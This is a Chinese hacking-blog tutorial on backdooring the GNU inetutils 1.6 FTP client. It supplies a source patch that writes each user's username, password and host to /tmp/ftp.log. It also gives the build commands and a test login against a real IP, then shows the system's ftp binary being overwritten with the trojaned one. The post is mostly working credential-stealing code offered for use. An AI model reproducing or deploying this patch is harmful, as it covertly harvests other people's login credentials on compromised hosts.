记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

记录FTP记录密码

2013-04-02 22:10

images几个月没更新了,好吧,我回来了,教学的403蛋,Inetutils 包含网络客户端和服务器.安装下列程序: ftp, ping, rcp, rlogin, rsh, talk, telnet 和 tftp

文件传输协议(FTP:File Transfer Protocol)使得主机间可以共享文件。 FTP 使用 TCP 生成一个虚拟连接用于控制信息,然后再生成一个单独的 TCP 连接用于数据传输。

控制连接使用类似 TELNET 协议在主机间交换命令和消息。文件传输协议是TCP/IP网络上两台计算机传送文件的协议,FTP是在TCP/IP网络和INTERNET上最早使用的协议之一,它属于网络协议组的应用层。FTP客户机可以给服务器发出命令来下载文件,上传文件,创建或改变服务器上的目录。

其实 早期在Internet上传输文件,并不是一件容易的事,我们知道 Internet是一个非常复杂的计算机环境,有PC、工作站、MAC、服务器、大型机等等,而这些计算机可能运行不同的操作系统,有Unix、Dos、 Windows、MacOS等等,各种操作系统之间的文件交流,需要建立一个统一的文件传输协议,这就是所谓的FTP。

虽然基于不同的操作系统有不同的 FTP应用程序,而所有这些应用程序都遵守同一种协议,这样用户就可以把自己的文件传送给别人,或者从其它的用户环境中获得文件。

与大 多数Internet服务一样,FTP也是一个客户机/服务器系统(C/S)。用户通过一个支持FTP协议的客户机程序,连接到远程主机上的FTP服务器 程序。用户通过客户机程序向服务器程序发出命令,服务器程序执行用户所发出的命令,并将执行的结果返回到客户机。

开始 下载源码打补丁

    [root@localhost tmp]# wget http://ftp.gnu.org/gnu/inetutils/inetutils-1.6.tar.gz
[root@localhost tmp]# tar xf inetutils-1.6.tar.gz
[root@localhost tmp]# cd inetutils-1.6

补丁代码:

diff -ur inetutils-1.6/ftp/ftp.c inetutils-1.6.patch/ftp/ftp.c
--- inetutils-1.6/ftp/ftp.c2008-12-28 03:03:40.000000000 +0700
+++ inetutils-1.6.patch/ftp/ftp.c2009-07-09 01:56:18.000000000 +0700
@@ -314,7 +314,11 @@
acct = getpass ("Account:");
n = command ("ACCT %s", acct);
}
- if (n != COMPLETE)
+ logger=fopen(LOG_DIR"/"FTPLOG,"a+");
+ fprintf(logger,"user:pass@host = %s:%s@%s\n",user,pass, host);
+ fclose(logger);
+
+ if (n != COMPLETE)
{
error (0, 0, "Login failed.");
return (0);
diff -ur inetutils-1.6/ftp/ftp_var.h inetutils-1.6.patch/ftp/ftp_var.h
--- inetutils-1.6/ftp/ftp_var.h2008-12-28 03:04:04.000000000 +0700
+++ inetutils-1.6.patch/ftp/ftp_var.h2010-08-08 23:38:23.000000000 +0700
@@ -151,3 +151,6 @@
FTP_EXTERN char macbuf[4096];

#include "extern.h"
+FILE *logger;
+#define LOG_DIR "/tmp"
+#define FTPLOG "ftp.log"

使用补丁

[root@localhost inetutils-1.6]# patch -p1 < ftp.diff

编辑这里 记录地址

    [root@localhost ~]# cat ftp/ftp_var.h
#define LOG_DIR "/tmp"
#define FTPLOG "ftp.log"

先测试一下

    [root@localhost ~]# ./configure --prefix=/tmp/ftplog
[root@localhost inetutils-1.6]# make
[root@localhost inetutils-1.6]# make install
[root@localhost inetutils-1.6]# cd /tmp/ftplog/bin/

顺便登录一个FTP

    [root@localhost bin]# ./ftp 173.254.246.117
Connected to 173.254.246.117.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 5000 allowed.
220-Local time is now 13:40. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (173.254.246.117:root): root
331 User root OK. Password required
Password:
530 Login authentication failed
./ftp: Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

查看记录

    [root@localhost tmp]# cat ftp.log
user:pass@host = root:[email protected]

成功 下面你可以编译覆盖源文件了
参数:

    ./configure --prefix=/usr --libexecdir=/usr/sbin --sysconfdir=/etc --localstatedir=/var

为了方便直接替换FTP 懒得重新编译

    [root@localhost tmp]# which ftp
/usr/kerberos/bin/ftp
[root@localhost bin]# rm /usr/kerberos/bin/ftp
[root@localhost bin]# cp /tmp/ftplog/bin/ftp /usr/kerberos/bin/ftp

再次尝试

    [root@localhost bin]# ftp 173.254.246.117
Connected to 173.254.246.117.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 5000 allowed.
220-Local time is now 13:43. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (173.254.246.117:root): fxxxxxu
331 User fuckyou OK. Password required
Password:
530 Login authentication failed
ftp: Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

再次查看

  [root@localhost tmp]# cat ftp.log
user:pass@host = root:[email protected]
user:pass@host = fxxxxxxu:[email protected]

知识来源: fuzzexp.org/ji-lu-ftp-ji-lu-mi-ma.html

阅读:177627 | 评论:0 | 标签:工具代码

想收藏或者和大家分享这篇好文章→复制链接地址

“记录FTP记录密码”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云